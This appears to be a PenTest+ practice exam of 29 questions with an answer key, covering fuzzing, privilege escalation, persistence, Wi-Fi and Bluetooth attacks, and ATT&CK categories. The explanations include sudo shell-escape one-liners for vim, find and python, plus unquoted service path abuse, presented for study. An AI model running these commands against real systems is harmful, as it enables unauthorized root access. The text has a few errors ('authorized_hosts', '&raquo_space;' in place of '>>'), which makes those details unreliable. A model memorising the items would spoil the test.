CompTIA PenTest+ Certification Practice Exam Chapter 3 (Total Sem Online Material)

Question 1

Web fuzzing is a data validation technique used to identify flaws in websites or web applications. Which of the following is not a practice commonly used in web fuzzing?
A.Feeding garbage or unexpected data to a user data input point to elicit error messages or other information
B.Inspection of website source data to check for potentially exploitable errors or warnings
C.Tampering with URL parameters
D.Sending HTTP request methods such as HEAD or POST where another method is expected

Answer 1

B.Inspection of website source data to check for potentially exploitable errors or warnings

Explanation:
While it is common to inspect a website’s source page to check for exploitable errors or warnings, this is not a practice that can be defined as fuzzing, which at its most basic level feeds unexpected data to a website or web application to attempt to elicit an unexpected system response.

A, C, and D are incorrect. A is incorrect because feeding garbage or unexpected data to elicit error messages or other information is essentially the definition of web fuzzing. Indeed, C and D—tampering with URL parameters and sending unexpected HTTP request methods—are themselves specific examples of this task.

Question 2

On which port(s) does the Windows Remote Management interface listen?
A.TCP/5985 and TCP/5986
B.TCP/389 and TCP/636
C.TCP/139 and TCP/445
D.TCP/135

Answer 2

A.TCP/5985 and TCP/5986

Explanation:
The Windows Remote Management interface, or WinRM, listens on TCP ports 5985 and 5986, leveraging HTTP and HTTPS, respectively, for management actions.

B, C, and D are incorrect. B is incorrect because TCP ports 389 and 636 are the ports for LDAP and LDAPS (LDAP over SSL), respectively. C is incorrect because TCP ports 139 and 445 are used for NetBIOS and SMB, respectively. D is incorrect because TCP/135 is used for Microsoft’s DCOM Service Control Manager.

Question 3

During a penetration test, you determine that a wireless network in your scope is running WEP encryption. Unfortunately, there are no actively connected clients transmitting data, but the access point allows open authentication. Which of the following would be the method of attack to ultimately obtain the encryption key?
A.Fragmentation attack
B.KRACK
C.Pixie dust attack
D.Reaver attack

Answer 3

A.Fragmentation attack

Explanation:
Like the ChopChop attack, fragmentation attacks are used to obtain an XOR file; the XOR file is not the encryption key but may be used to create packets for injection into the network. A fragmentation attack repeatedly pulls fragments of the keystream from occasional packets sent by the access point. Because some of the contents of a packet are predictable to a degree (due to headers), a small portion of the keystream may be obtained by XOR-ing. This small piece of keystream may then be used to inject fragments of arbitrary data, allowing the attacker to repeat the attack and recover more of the keystream. Over a long enough time period, a complete XOR file can be built, allowing for arbitrary packet injection. At this point, the attacker can send arbitrary data to the AP (such as ARP request packets), which the AP will relay out. The attacker can collect these packets to obtain sufficient initialization vectors (IVs) to ultimately crack the WEP key with aireplay-ng. The project page for aircrack-ng has an excellent guide for this attack method; at the time of this writing, it may be found at https://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients.

B, C, and D are incorrect. B is incorrect because KRACK (or the Key Reinstallation AttaCK) is a replay attack technique that targets WPA2. By spoofing a portion of an authenticated system’s four-way handshake, an attacker is able to trick the AP and client into resetting their key data to known values, effectively causing reuse of cryptographic information. Because cryptographic information is being reused, the contents of packets are then vulnerable to decryption, allowing an attacker to view potentially sensitive information. C is incorrect because a pixie dust attack is another attack focused on WPA2 and its use of Wi-Fi Protected Setup (WPS). Since the seed values of WPS are often simple to guess or known values based on published research, the attacker can simply sniff traffic for a period of time to be able to decrypt the WPS pin and password, allowing access to the AP. D is incorrect because a reaver attack is another WPA2 attack targeting WPS. Here, the eight-digit PIN is simply guessed via brute force.

Question 4

Which of the following are examples of establishing daemon-based persistence? (Choose two.)
A.Copying the attacking system’s public SSH key into ~/.ssh/authorized_hosts
B.Creating a cronjob that attempts to establish a reverse shell to the attacking system every 15 minutes
C.Modifying the BootExecute registry key value to establish a bound shell on the victim system at boot time
D.Modifying an application that users of the compromised system are known to use frequently, such that it establishes a reverse shell callback on launch

Answer 4

B.Creating a cronjob that attempts to establish a reverse shell to the attacking system every 15 minutes
C.Modifying the BootExecute registry key value to establish a bound shell on the victim system at boot time

Explanation:
The abuse of system-executed services such as cron (which will execute user-defined cron jobs as defined in the cron table—just in the context of the user in question) and certain Windows registry keys to provide readily available shells is the defining feature of daemon-based persistence methods. In the case of B, persistence is maintained by the cron daemon; even if the reverse shell is killed manually, the cron daemon will attempt to reestablish it every 15 minutes. With C, persistence is achieved on a Windows system by establishing a bound shell whenever the server reboots, as the Session Manager (smss.exe) executes the programs listed in the Data field of the BootExecute key at boot time.

A and D are incorrect. A is incorrect because the use of SSH key-based persistence abuses a feature of SSH for persistence, rather than exploiting automated services. D is incorrect because modifying a frequently used application is not exploitation of an automated process, as it requires user interaction to provide shell access rather than such access being provided in the background and invisibly to the user.

Question 5

Which ATT&CK matrix category describes techniques used to bypass detection or other network protection mechanisms? Specific examples include bypassing UAC and deploying rootkits.
A.Initial access
B.Lateral movement
C.Persistence
D.Defense evasion

Answer 5

D.Defense evasion

Explanation:
Defense evasion techniques described in the ATT&CK matrix are ultimately aimed toward evading detection or other network defenses. In the examples provided, bypassing UAC allows attackers to execute commands in an administrative context on Windows systems without a UAC alert notifying users, while rootkits hide the presence of malware by intercepting core operating system calls that supply key system information.

A, B, and C are incorrect. A is incorrect because initial access techniques are used to gain initial footholds into a target network. Examples of this include spearphishing and abuse of trusted relationships with outside organizations. B is incorrect because lateral movement techniques facilitate an attacker’s movement throughout a target organization’s network, allowing access to and control of additional systems. Examples of this include pass-the-hash and pass-the-ticket attacks. C is incorrect because persistence techniques consist of any access, action, or configuration changes that enable an attacker to ensure they can retain a presence on the system. Examples of this include modification of user .bash_profile files and new account creation.

Question 6

Popularly exploited by the Conficker worm, which vulnerability relies on a buffer overflow in the Microsoft Server service to achieve remote code execution on Windows 2000, XP, and Server 2003?
A.DoublePulsar
B.MS08-067
C.EternalSynergy
D.MS15-127

Answer 6

B.MS08-067

Explanation:
MS08-067 describes the vulnerability at the heart of the Conficker worm and relies on a buffer overflow in the Windows Server service, which handles remote procedure calls.

A, C, and D are incorrect. A is incorrect because DoublePulsar is a backdoor implant payload frequently used with other exploits, rather than a vulnerability. C is incorrect because EternalSynergy is an exploit (rather than a vulnerability) that targets SMBv1 with a buffer overflow to achieve code execution. D is incorrect because MS15-127 is a vulnerability that targets Microsoft DNS rather than its Server service to achieve remote code execution; in addition, MS15-127 was not leveraged by the Conficker worm.

Question 7

During a penetration test, you discover that HTTP parameters are contained in the URL in plaintext with no obfuscation in a web application. You find that by changing the “?OrderNumber=12345” component of the URL to “?OrderNumber=XXXXX”, you are able to gain access to orders you would not otherwise be able to see. This is an example of what type of vulnerability?
A.HTTP parameter pollution
B.Unvalidated redirection
C.Persistent XSS
D.Insecure direct object reference

Answer 7

D.Insecure direct object reference

Explanation:
The vulnerability in question is an example of an insecure direct object reference, and is shown through two facts: First, the use of a query (denoted by the “?” operator) tells us that the browser is sending the information that follows to the web server. Second, the use of the term “OrderNumber” in plaintext with a simple five-digit value suggests that the web server simply takes a client’s word for it when they say they have authorization to view a file. This class of vulnerability is best remedied by validating private object references and verifying authorization to all such referenced objects.

A, B, and C are incorrect. A is incorrect because HTTP parameter pollution would consist of sending specially crafted HTTP requests that contain multiple instances of an HTTP parameter with different values for the purpose of fuzzing a website or web application. HTTP parameter pollution is typically a complex enough issue to require manual testing, and different web servers will handle multiple identically named HTTP parameters differently. The results of parameter pollution can range from simple error messages to authentication or input validation bypasses. B is incorrect because the vulnerability described in the question produces information disclosure on the same website rather than redirecting the user to a different, malicious site. Unvalidated redirection would require that an attacker craft a malicious link to the vulnerable site, which then redirects the victim to a site of the attacker’s choosing, typically for the purpose of a phishing campaign or XSS attack. C is incorrect because the vulnerability described does not result in malicious code being served by the hosting server, as persistent XSS occurs when malicious code is embedded into a website that is visited by the victim. Additionally, persistent XSS targets the information held in the visitor’s browser (by getting the user to transfer information such as session tokens or other sensitive information) rather than the web server itself.

Question 8

Which technique is marked by overwriting a program’s execution stack with “no operation” instructions, with an end goal of shifting a program’s instruction pointer to a specific command sequence? It is used extensively in the development of buffer overflow attacks.
A.Return-oriented programming
B.Ret2libc
C.Stack smashing
D.NOP sled

Answer 8

D.NOP sled

Explanation:
The technique described is a NOP sled (also called a NOP slide or NOP ramp). A NOP instruction indicates that no action should be taken by a processor during the execution of a program, effectively sliding the instruction pointer further down the stack until it reaches an instruction that can be acted upon.

A, B, and C are incorrect. A is incorrect because return-oriented programming is a category of attack used to achieve arbitrary code execution in spite of existing defenses such as code signing and executable space protection. Briefly, return-oriented programming seeks to gain control of a program’s execution flow and then employ instruction sequences already present in memory. Since return-oriented programming is an attack type rather than a specific technique used to slide the instruction pointer along, this answer is incorrect. B is incorrect because ret2libc attacks are a specific type of return-oriented programming that attempts to leverage an existing library function in memory to obtain code execution rather than deploying a custom-written payload. As with the broader category of return-oriented programming, this is a category of attack rather than a specific technique used in the attack, making this answer incorrect as well. C is incorrect because stack smashing is a specific type of buffer overflow attack that occurs when data is written to memory addresses on a program’s call stack, taking up more storage space than the intended data buffer is meant to contain. Since stack smashing is a type of buffer overflow attack rather than a technique used in the development of buffer overflow attacks, this answer is incorrect.

Question 9

During preparation for a phishing campaign, you identify a critical business web application that does not verify the target of a redirect included in an HTTP GET parameter. You choose to create links that route to the legitimate web service but redirect to your attacking system where you are hosting a cloned version of the application’s login page that will harvest user credentials. This is an example of what type of vulnerability?
A.Reflected XSS
B.Unvalidated redirection
C.HTTP parameter pollution
D.Unauthorized API use

Answer 9

B.Unvalidated redirection

Explanation:
Unvalidated redirection occurs when untrusted input is accepted by a web application in such a way that it can cause a visitor to be redirected to another site. If an attacker leverages this and links to a malicious site of their own creation, this attack could be a critical component of a successful phishing campaign, as phishing victims are more likely to trust a link that appears to be part of a site they visit frequently.

A, C, and D are incorrect. A is incorrect because reflected XSS would require a user to be tricked into clicking a malicious link that sends the payload (typically a snippet of JavaScript that steals the user’s session token or gets them to download a malicious file) to the web server; the web server then does nothing with this payload but feed it back to the victim, without storing it locally. In this instance, a malicious link is crafted and sent directly to the user, after which the intended site is loaded before redirecting the visitor to a cloned site under the attacker’s control for the purpose of harvesting credentials. As such, this answer is incorrect. C is incorrect because HTTP parameter pollution would require the attacker to fuzz the target web server with HTTP requests that have multiple instances of the same HTTP parameter, rather than sending a malicious link to the victim, as in the example. Recall that HTTP parameter pollution is a type of application fuzzing that specifically tests how a website handles multiple HTTP parameters with the same name. Different web servers will handle multiple identically named HTTP parameters differently, and the results of parameter pollution can range from simple error messages to authentication or input validation bypasses. D is incorrect because unauthorized API use would involve the use of a feature or interface not intended for typical end users. In this case, a standard feature (an HTTP redirect) is abused due to a lack of sanitization of user input before the redirect is processed, making this answer incorrect as well. As a refresher, unauthorized or unexpected API use can come up for numerous reasons: developers may have left a feature enabled when pushing an application into an environment, development and production environments may not be properly segregated, or developers and administrators may just find it convenient to have the functionality of the API in question available at all times.

Question 10

Which of the following attack vectors is best defined as tricking an application into loading a malicious library file by exploiting the documented library search order paths?
A.DLL hijacking
B.DLL injection
C.LSASS dumping
D.Unquoted service path abuse

Answer 10

A.DLL hijacking

Explanation:
DLL hijacking occurs when an application is manipulated into loading a malicious DLL file by exploiting the documented search path for DLL files as followed by Windows. Compare this with DLL injection, explained next.

B, C, and D are incorrect. B is incorrect because DLL injection is a technique wherein a running service is manipulated into loading a library file—but rather than abusing the default DLL lookup paths as documented by Microsoft, as with DLL hijacking, this is accomplished through means such as the SetWindowsHookExA function in the Windows API, or through modification of registry values that define the standard DLLs loaded into user processes. In other words, hijacking relies on normal Windows behavior to trick an application into loading a malicious library, whereas injection forcibly causes the application in question to load a malicious library. C is incorrect because LSASS dumping does not rely on getting a process to load a malicious library file. Rather, LSASS dumping occurs when an attacker obtains a memory dump of the LSASS.exe process on a Windows system. If the .dmp file produced is fed into Mimikatz or parsed manually, plaintext passwords can be retrieved for all user accounts on the system. D is incorrect because unquoted service path abuse becomes possible when a service managed via the Windows Service Control Manager has a space somewhere in the path to the executable and the path string is not encased with quotation marks. While this is likely to cause Windows to load library files that it would not otherwise load, the feature being exploited is the method Windows uses to find a service executable rather than the library search paths, making this answer incorrect.

Question 11

Which of the following tools is best suited for routing penetration testing traffic between a network accessible to a penetration tester and another that cannot be accessed directly?
A.Proxychains
B.Responder
C.Process Explorer
D.RDP

Answer 11

A.Proxychains

Explanation:
Proxychains is used to route any network traffic through an established SOCKS proxy. It simplifies the process of scanning and attacking networks to which a penetration tester may not otherwise be able to access.

B, C, and D are incorrect. None of these options is capable of proxying arbitrary traffic to remote networks otherwise inaccessible to an attacker. B is incorrect because Responder is a LLMNR, NBT-NS, and MDNS poisoner with a built-in rogue authentication server. C is incorrect because Process Explorer is a component of Microsoft’s Sysinternals suite that provides a greatly enhanced task manager and system monitor that can be used in system troubleshooting and debugging. D is incorrect because RDP (Remote Desktop Protocol) is a remote access protocol that enables users to obtain graphical desktop sessions across networks.

Question 12

Consider an /etc/hosts file with hundreds of entries similar to the following:

10.10.1.2 host.domain.com host

Of the following options, which would be the best choice to create a text file containing a list of IP addresses?
A.grep 10. /etc/hosts&raquo_space; ips.txt
B.awk {‘print $2’} /etc/hosts > ips.txt
C.awk {‘print $1’} /etc/hosts&raquo_space; ips.txt
D.grep -v domain.com /etc/hosts&raquo_space; ips.txt

Answer 12

C.awk {‘print $1’} /etc/hosts&raquo_space; ips.txt

Explanation:
The print function in awk can be used to extract specific columns of text as delineated by whitespace (that is, spaces or tabs), or by any other delimiter character when used with the -F flag. The&raquo_space; operator is used to concatenate output to the named file rather than overwrite the entire file each time matching data is found.

A, B, and D are incorrect. A is incorrect because the use of grep would pull the entire line any time a match for “10.” was found, rather than just the IP address in question. B is incorrect because the use of {‘print $2’} in awk would print the second field of text—usually a hostname or FQDN in a hosts file—rather than the IP addresses. D is incorrect because the use of grep would pull whole lines rather than individual fields of data before feeding them into the text file. In addition, the -v flag would provide matches for all lines that did not contain the string “domain.com”, leaving only lines which did not contain an FQDN.

Question 13

Which of the following general privilege escalation vectors is applicable to Windows hosts? (Choose two.)
A.SUID/GUID program abuse
B.Unattended installation artifacts
C.Insecure sudo use
D.DLL hijacking

Answer 13

B.Unattended installation artifacts
D.DLL hijacking

Explanation:
The collection of artifacts from unattended operating system installations and DLL hijacking are both categories of privilege escalation techniques that target Windows operating systems.

A and C are incorrect. SUID/GUID program abuse and insecure sudo access are privilege escalation vectors used in attacking *nix operating system families.

Question 14

Which of the following are common targets used to test for local file inclusion vulnerabilities? (Choose two.)
A./etc/shadow
B.Windows\System32\config\SAM
C./etc/passwd
D.Windows\System32\drivers\etc\hosts

Answer 14

C./etc/passwd
D.Windows\System32\drivers\etc\hosts

Explanation:
The passwd file in *nix operating systems and the hosts file in Windows operating systems are some of the more common candidates for initial LFI tests, as they are world-readable and can provide some further enumeration of the system in question (system users in the case of the passwd file in *nix environments, and frequently visited remote systems in the case of the hosts file for Windows).

A and B are incorrect. The shadow files in *nix operating systems and SAM files in Windows operating systems are expected to be locked behind root or administrative access, respectively, for security reasons; while it is not unheard of to encounter a web server running as a root or administrative user, it is still a rare occurrence, making it a more productive use of time to test with files that should be accessible by all users first.

Question 15

Spanning Tree Protocol is a link layer network protocol that ensures there are no switching loops in a series of connected Layer 2 networks. Triggering repeated election broadcasts can prevent hosts on the network from requesting information needed for legitimate communications, as all their bandwidth is ultimately absorbed in nominating root bridges for the local link. Why is this not an avenue of attack that should be considered by a penetration tester?
A.The technique effectively halts testing of any further targets, thereby preventing the penetration tester from fully assessing the target network or the related goals, such as privilege escalation or lateral movement.
B.Denial of service methods often only last as long as the attacker focuses their resources on the attack, essentially wasting billable hours that could be better spent performing other tasks.
C.Denial of service attacks are destructive, focusing solely on disruption of legitimate use of services, which can effectively halt business operations for a client organization
D.All of the above

Answer 15

D.All of the above

Explanation:
Each of the answers listed details a different reason that this attack vector (and more broadly, DoS attacks in general) is ill-advised without extensive coordination with the client. Denying service to others also necessarily involves denying service to yourself as a penetration tester, preventing you from conducting any further activities that would achieve the goals of the penetration test. In addition, these efforts are often time sinks that consume valuable testing time that could be spent trying to find another means of ingress to a target network. Arguably most important, however, is the fact that DoS attacks can halt legitimate business activity on client networks and systems. Penetration testing should be conducted with the aim of identifying and verifying vulnerabilities, rather than simply exploiting vulnerabilities for its own sake without regard to the client’s need to conduct business during the penetration test. In the case of DoS vulnerability testing and verification, it should generally be conducted only when explicitly called for in the RoE, or in close coordination with the client through the listed point of contact. Otherwise, it is generally best to simply document the vulnerability and press on to other issues.

A, B, and C are incorrect. All of these are good reasons not to blindly conduct DoS testing of targets during a penetration test, making them incorrect answers, as “All of the above” is the best fit for this question.

Question 16

Which of the following utilities can be used to effect privilege escalation in a Linux environment if the current user has access to run them as root?
A.vim
B.find
C.python
D.All of the above

Answer 16

D.All of the above

Explanation:
All of the commands listed can be abused to obtain a root system shell in the event that a user has root access to them (either via sudo or a root SUID bit). In the case of vim, this is accomplished by viewing any file (for example, sudo vim /etc/hosts) and entering the command sequence !sh in vim’s normal mode (rather than insert mode, which is used when entering text). Normal mode is the typical default starting mode for vim. With find, the abuse stems from the -exec option; if the searched file is found, any given command can be executed since the command is run from a root context. An example of this is sudo find /etc/hosts -exec /bin/sh \;. With python, privilege escalation can be achieved by invoking the same command sequence that is often used to escape a chroot jail—for example, sudo python -c ‘import pty;pty.spawn(“/bin/sh”)’. Note that this is not by any means an exhaustive list of commands vulnerable to sudo abuse; other such vulnerable commands include (but are not limited to) less, more, awk, or older versions of nmap (up to 5.21). Any command that can be run as root is worth investigating as a penetration tester.

A, B, and C are incorrect. All these commands can be effectively abused to provide privilege escalation when they can be run as root.

Question 17

During a penetration test, you determine that there are very few ports available for movement and data transfer that are not being blanket denied by the target organization’s firewalls. You elect to smuggle data out of the target network by embedding it into DNS requests. This is an example of what ATT&CK technique?
A.Exfiltration over alternative protocol
B.Exfiltration over physical medium
C.Process discovery
D.Data from removable media

Answer 17

A.Exfiltration over alternative protocol
Explanation:
The use of DNS as an exfiltration vector abuses the necessity of legitimate DNS traffic in a network, allowing for data to be taken from a target system.

B, C, and D are incorrect. B is incorrect because exfiltration over a physical medium would be best represented by transferring stolen data to removable media, such as USB drives or cell phones, rather than through abuse of a network protocol, as in the example. C is incorrect because process discovery is a discovery tactic unrelated to data exfiltration. D is incorrect because data from removable media refers to a data collection tactic rather than anything related to data exfiltration.

Question 18

Which cryptographic side-channel attack exploits the delay in volatility in system RAM after a hard reboot, and is frequently used to target encryption keys that were sitting in memory on the target system?
A.Cold boot attack
B.JTAG debugging
C.Serial connections
D.Timing attack

Answer 18

A.Cold boot attack

Explanation:
A cold boot attack exploits the delay in volatility in system RAM after a hard reboot, and is frequently used to target encryption keys that were sitting in memory on a target system.

B, C, and D are incorrect. B is incorrect because JTAG debugging leverages the IEEE standard used to test printed circuit boards to obtain elevated access to a device; since this is not a side-channel attack and does not exploit RAM volatility delay, this answer is incorrect. C is incorrect because serial connections are communication interfaces used to transfer information to and from various devices, such as a modem or terminal; since this is not a side-channel attack, but rather abuse of a known standard connection mechanism, this answer is incorrect. D is incorrect because a timing attack is a cryptographic side-channel attack that is based on measuring the time required for computations to complete; since all computations take time, and the time required varies directly based on input, an attacker is able to observe the time to completion for information they would like to harvest and then compare the time expended to values based on known inputs. While this is a side-channel attack, it does not exploit the delay in the volatility of system memory, making this answer incorrect as well.

Question 19

Which of the following commands will display general firewall configuration rules on a target system running the appropriate firewall service? (Choose two.)
A.iptables -S
B.netsh firewall show config
C.netsh advfirewall firewall show rule name=all
D.ufw list

Answer 19

A.iptables -S
C.netsh advfirewall firewall show rule name=all

Explanation:
On a Linux system running iptables, the command iptables -S will display currently loaded firewall configuration rules. Similarly, the command netsh advfirewall show rule name=all will do the same on a Windows host.

B and D are incorrect. B is incorrect because the command listed here will only display the running state of the firewall on a Windows host; while this is valuable information, it does not give granular rules as stated in the question. D is incorrect because list is not a valid subcommand for ufw, which serves as a more easily accessible frontend for iptables on Linux hosts. ufw status will return the firewall state and loaded rules if the firewall service is running.

Question 20

Which attack occurs when an attacker is able to trick a victim into performing unexpected actions on a web application to which they are presently authenticated?
A.Code injection
B.DOM-based XSS
C.Cross-site request forgery
D.Local file inclusion

Answer 20

C.Cross-site request forgery

Explanation:
The attack described is a cross-site request forgery, wherein an application’s trust of a given client (based on their session ID) is exploited to execute changes that are not intended by the user in question. Although the target of a CSRF attack is the server, the attack is necessarily initiated by the abuse of the authenticated victim’s session (perhaps via a well-crafted link in a phishing e-mail), making this a client-side attack.

A, B, and D are incorrect. A is incorrect because code injection would involve an attacker abusing an application system call that relies on unsanitized user input, rather than tricking a user into performing an action they otherwise would not have taken, as described in the question. In other words, since the attack described is not executed against the web server by the attacker directly, and instead relies on abuse of the user’s authenticated session, this answer is incorrect. B is incorrect because DOM-based XSS is a client-side attack that targets the victim’s browser rather than the remote server. Since the attack described is targeting a function found on the remote server rather than data or code execution in the user’s browser, this answer is incorrect. Recall that DOM-based XSS attacks are contained in the Document Object Model (DOM), which is a part of the environment of a victim’s browser. This attack method frequently abuses URIs (uniform resource indicators), which are not transferred to the web server but can contain snippets of code; this allows attackers to perform various actions, such as stealing a user’s session cookies. D is incorrect because local file inclusion would show through the disclosure of a file on the web server, which would ordinarily not be accessible. The attack described instead tricks a user into performing an action they would otherwise be unlikely to perform. Since no disclosure of a local file is described, this answer is incorrect.

Question 21

Which family of attack is used to obtain control of the operation of Bluetooth-enabled devices?
A.Bluesnarfing
B.Bluebugging
C.Jamming
D.Pixie dust

Answer 21

B.Bluebugging

Explanation:
Bluebugging attacks exploit a flaw in Bluetooth data transfers to keep the attacking system as a trusted device, allowing the attacker to pair with the victim device and assume control of its operation. Modern Bluetooth implementations have numerous security checks in place to prevent this type of attack, such as enhancements in Bluetooth device firmware and the requirement of a PIN to complete pairing. As in WPA-PSK, these security measures can still be defeated if an attacker is able to capture an authentication handshake, allowing recovery of the PIN used.

A, C, and D are incorrect. A is incorrect because bluesnarfing is the use of vulnerabilities in a device or in Bluetooth to steal information, such as phone numbers, SMS message contents, or calendar information, but does not imply or require control over the target, as stated in the question. C is incorrect because jamming attacks are those that attempt to render a wireless protocol unusable, usually by flooding the wireless spectrum used by the target protocol with additional transmissions and degrading the signal-to-noise ratio. Thus, jamming attacks are a form of denial of service attack, which cannot be used to seize control of a device, making this an incorrect answer. D is incorrect because a pixie dust attack is one aimed at cracking the PIN used in WPS-enabled Wi-Fi routers, with the ultimate goal of enabling an attacker to connect to and authenticate with a wireless AP; since this attack targets 802.11 Wi-Fi networks rather than Bluetooth connections, it is incorrect.

Question 22

Which of the following services is most likely to be exploitable in a Windows environment as a low privilege user? Assume that all services listed are run as an administrative user or SYSTEM.
A.C:\WINDOWS\system32\lsass.exe
B.C:\Program Files (x86)\Vendor\Core Services\app.exe
C.C:\Program Files\application_name\bin\application2.exe
D.“C:\Program Files (x86)\Vendor_2\app binaries\app.exe”

Answer 22

B.C:\Program Files (x86)\Vendor\Core Services\app.exe

Explanation:
The presence of whitespace in the service path for an application running as an administrator or SYSTEM makes an application vulnerable to unquoted service path privilege escalation. In this case, creating a malicious executable named Core.exe and placing it in the C:\Program Files (x86)\Vendor directory would cause the malicious file to be run on system startup or when the service in question is restarted. Note that while there is also whitespace in the “C:\Program Files (x86)” parent directory, the C:\ root directory has write protections in place by default that would prevent a low privilege user from writing anything there.

A, C, and D are incorrect. A is incorrect because the path listed is for the Local Security Authority Subsystem Service, which is a protected and critical core Windows feature. In addition to the lack of whitespace in the service path, the C:, C:\WINDOWS, and C:\WINDOWS\system32 directories are all write-protected directories, preventing low privileged accounts from making modifications without authorization. C is incorrect because the path listed only contains one instance of whitespace—in the C:\Program Files directory, which is saved in the C:\ parent directory. Since write protections are enabled by default at the root C:\ directory, the creation of a malicious C:\Program.exe file would not be possible for a low privilege user, removing this as a candidate for privilege escalation from the choices present. D is incorrect because although there is a potential location to place a malicious binary—at C:\Program Files (x86)\Vendor_2, with the binary named app.exe—the path is wrapped in quotes, ensuring that the service manager will follow the stated path all the way to the end, rather than executing the first .exe file it finds.

Question 23

Which of the following Group Policy attributes is most likely to allow privilege escalation when found in files on a target Windows system?
A.changeLogon
B.neverExpires
C.acctDisabled
D.cpassword

Answer 23

D.cpassword

Explanation:
The cpassword attribute found in Group Policy Objects is a glaring security vulnerability due chiefly to the use of a static encryption key for all such entries as well as the open publication of the key used by Microsoft on its documentation pages. If a cpassword attribute is found in a Group Policy Object (found in the SYSVOL directory), it is as good as storing a password in plaintext. The cpassword attribute can be found in a number of files, including SYSVOL\Groups.xml, Services\Services.xml, ScheduledTasks\ScheduledTasks.xml, Printers\Printers.xml, Drives\Drives.xml, and DataSources\DataSources.xml.

A, B, and C are incorrect. The attributes changeLogon, neverExpires, and acctDisabled are typically found in the same locations as cpassword, but they do not represent a security flaw in and of themselves. Rather, they represent the status of the associated account, indicative of whether the account user must change their password at login, whether or not the password expires, and if the account is disabled, respectively.

Question 24

This category of distributed DoS attack focuses on oversaturating server resources, with its severity measured in packets per second (Pps):
A.Application layer attack
B.Volume-based attack
C.ICMP flooding
D.Protocol attack

Answer 24

D.Protocol attack

Explanation:
A protocol attack is one that is focused on locking up a target system by consuming all available system resources, such as processing capability or memory. Attack severity is measured in packets per second, or Pps.

A, B, and C are incorrect. A is incorrect because an application layer attack attempts to crash a specific service on a target system, rather than bring the entire system down by consuming its available CPU, memory, or storage assets. Application layer attacks are measured in requests per second, or Rps. B is incorrect because a volume-based attack is one that attempts to consume a target’s available bandwidth (rather than system CPU cycles, memory, or storage), effectively knocking it offline. Volume-based attacks are measured in bits per second, or bps. C is incorrect because ICMP flooding is a specific example of a volume-based attack, which is itself an incorrect answer. ICMP flooding is a denial of service attack method that focuses on consuming available network bandwidth by filling it with constant ICMP echo requests, effectively wasting bandwidth that would otherwise be used by legitimate traffic. Since these attacks do not target server CPU, memory, or storage resources, this answer is incorrect.

Question 25

Addressed by Microsoft Security Bulletin MS17-010, which exploit abuses the handling of certain packets by SMBv1 to achieve remote code execution?
A.EternalRed
B.Dirty COW
C.HeartBleed
D.EternalBlue

Answer 25

D.EternalBlue

Explanation:
Addressed by Microsoft Security Bulletin MS17-010 and CVE-2017-0144, EternalBlue is capable of providing remote code execution on nearly all versions of Microsoft Windows that have not been patched, starting from 2000 SP0.

A, B, and C are incorrect. A is incorrect because EternalRed is a vulnerability that provides remote code execution in Samba, the GNU implementation of SMB. EternalRed is not addressed by MS17-010, making this answer incorrect. B is incorrect because Dirty COW (Copy-on-Write) is a Linux Kernel vulnerability that could be leveraged to achieve privilege escalation. Since the vulnerability listed in the question explicitly targets Windows systems, this is incorrect. C is incorrect because HeartBleed is a vulnerability in OpenSSL that could be used to steal web server private keys or user session cookies. Since HeartBleed is neither applicable to SMBv1 nor addressed by MS17-010, this answer is incorrect.

Question 26

Which of the following are tactics for information collection per MITRE’s ATT&CK matrix? (Choose two.)
A.Data encryption
B.Clipboard data
C,Screen capture
D.Password policy discovery

Answer 26

B.Clipboard data
C,Screen capture

Exp[lanation:
In MITRE’s ATT&CK matrix, clipboard data and screen captures are tactics for information collection for the purposes of gathering data for exfiltration, privilege escalation, or lateral movement.

A and D are incorrect. Neither of these choices is used for information collection. A is incorrect because encryption is a tactic used for data exfiltration. D is incorrect because password policy discovery is a tactic used for discovery and enumeration of a target system or network.

Question 27

Which attack against Bluetooth-enabled devices effectively denies use of Bluetooth functionality?
A Bluesmacking
B.SYN flooding
C.Bluejacking
D.Ping flooding

Answer 27

A Bluesmacking

Explanation:
Bluesmacking may be most easily understood as the Bluetooth equivalent of a ICMP flood against a TCP/IP target: the attack is implemented through the use of echo requests over the L2CAP layer via an L2CAP ping. By using oversized packets, an attacker can crash the Bluetooth service.

B, C, and D are incorrect. B and D are incorrect because SYN flooding and ping flooding are DoS attacks that target TCP/IP network devices, ultimately attempting to consume server resources and bandwidth until the target system is no longer available. Since Bluetooth does not rely on TCP/IP networking, these are incorrect. C is incorrect because bluejacking is a technique used to send unsolicited mobile messages and information to victims via Bluetooth connections. Since the question asked about an attack that is used to deny service, this answer is incorrect.

Question 28

Which attack method exploits AD legacy support for older Windows clients, resulting in an attacker obtaining a weakly encrypted ticket-granting service that uses the NTLM hash of the service owner’s account as the encryption key? By obtaining such a ticket, the attacker can identify the hash and crack it offline, allowing for privilege escalation, lateral movement, or persistence in a given system or environment.
A.Plaintext LDAP Credential Transmission
B.Kerberoasting
C.Scheduled Task Abuse
D.Insecure Sudo Access

Answer 28

B.Kerberoasting

Explanation:
The attack described is Kerberoasting. Modules to simplify this attack are found in both PowerSploit and Empire.

A, C, and D are incorrect. A is incorrect because plaintext LDAP credential transmission interception does not rely Active Directory support for older, legacy Windows clients to obtain NTLM hashes. Rather, it allows credential harvesting to occur if the application making the LDAP request is not doing so via LDAPS (LDAP over SSL, or Secure LDAP). This is because the application transfers the username and password in plaintext in the very first packet it sends, leaving it vulnerable to sniffing via a network protocol analyzer like Wireshark. C is incorrect because scheduled task abuse occurs most often when a script or .bat file run as part of a scheduled task is world-writeable, creating openings for privilege escalation, lateral movement, or persistence. Since there is no abuse of Active Directory support for legacy Windows clients, this answer is also incorrect. D is incorrect because insecure sudo access is a privilege escalation vector found in *nix environments; since the attack vector described targets NTLM hashes, as used in a Windows environment, this answer is incorrect.

Question 29

Which of the following is a security enhancement in SNMPv3 over the previous iterations?
A.2FA is enforced, requiring access to both a password and a security token.
B.Authentication requires a username and password in version 3.
C.The default community string was changed from “public” to “open” to circumvent existing wordlists.
D.Trap notifications now require an administrator’s signoff before being sent to the SNMP manager.

Answer 29

B.Authentication requires a username and password in version 3.

Explanation:
In SNMP versions 1 and 2, authentication only required the community string, which was transmitted in plaintext between managers and agents. Because a username and password are now required, unauthenticated users are prevented from gaining access to the SNMP server and obtaining information about the environment.

